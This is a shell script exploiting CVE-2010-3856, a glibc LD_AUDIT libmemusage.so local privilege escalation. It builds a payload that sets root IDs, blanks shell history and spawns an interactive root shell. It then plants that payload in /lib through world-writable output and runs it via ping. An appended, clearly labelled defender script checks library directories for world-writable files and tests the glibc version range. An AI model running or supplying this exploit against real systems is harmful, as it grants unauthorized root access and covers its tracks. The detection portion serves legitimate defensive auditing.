```sh
#!/bin/sh
#
# [+] Linux GNU/libc <= 2.12.x LD_AUDIT libmemusage.so local root exploit
#
# Edited by Todor Donev
# This is another exploit for CVE-2010-3856
#
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash, system
# compromise, etc.) caused by the use of these
# programs is not Todor Donev's responsibility.
#
# Use at your own risk and educational purpose
# ONLY!
#
# Other exploits:
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit
# http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
# http://www.exploit-db.com/exploits/18105/
# http://seclists.org/fulldisclosure/2010/Oct/257
# http://seclists.org/bugtraq/2010/Oct/200
#
echo "[+] Setting umask to 0 so we have world writable files."
umask 0
echo "[+] Preparing binary payload.."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
    unlink("/lib/.ploit.so");
    setuid(0);
    setgid(0);
    setenv("HISTFILE", "/dev/null", 1);
    execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/.ploit.so" ping 2>/dev/null
echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/.ploit.so
rm /tmp/payload.c /tmp/exploit
echo "[+] Executing payload.."
LD_AUDIT=".ploit.so" ping
```
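
A defender-side check for the traces this script leaves, added here as an example and not part of the original paste: it flags world-writable regular files in library directories (what the `umask 0` plus `MEMUSAGE_OUTPUT` step creates) and tests a glibc version string against the `<= 2.12.x` range named in the header. The function names, the directory list and the `--scan` switch are assumptions of this example; distribution packages can carry backported fixes, so the version test is only a first filter.

```shell
#!/bin/sh
# Added example, not from the original paste: host check for traces of the
# LD_AUDIT/libmemusage technique. Names, paths and --scan are assumptions.

# Print regular files under the given directories that carry the o+w bit.
# A file created by a setuid-root process while the caller's umask is 0
# appears here: root-owned and world-writable inside a trusted lib path.
find_world_writable_libs() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -0002 2>/dev/null
    done
    return 0
}

# Return 0 when a glibc version string (e.g. "2.12.1") is <= 2.12.x,
# 1 when it is newer, 2 when it cannot be parsed. Heuristic only.
glibc_in_affected_range() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%[!0-9]*}
    case "$major" in ''|*[!0-9]*) return 2 ;; esac
    [ -n "$minor" ] || return 2
    [ "$major" -lt 2 ] && return 0
    [ "$major" -eq 2 ] && [ "$minor" -le 12 ]
}

# Report the local glibc version if it is in range, then list suspicious
# files with owner and mode so root-owned ones stand out.
audit_host() {
    ver=$(getconf GNU_LIBC_VERSION 2>/dev/null || true)
    ver=${ver#glibc }
    if glibc_in_affected_range "$ver"; then
        echo "glibc $ver is <= 2.12.x: confirm the vendor patch level"
    fi
    find_world_writable_libs /lib /lib64 /usr/lib /usr/lib64 |
        while IFS= read -r f; do ls -ld "$f"; done
}

if [ "${1:-}" = "--scan" ]; then audit_host; fi
```

Run it with `--scan` to check the local host; any file it lists in a library directory should be treated as an incident lead, since the dynamic loader trusts those paths.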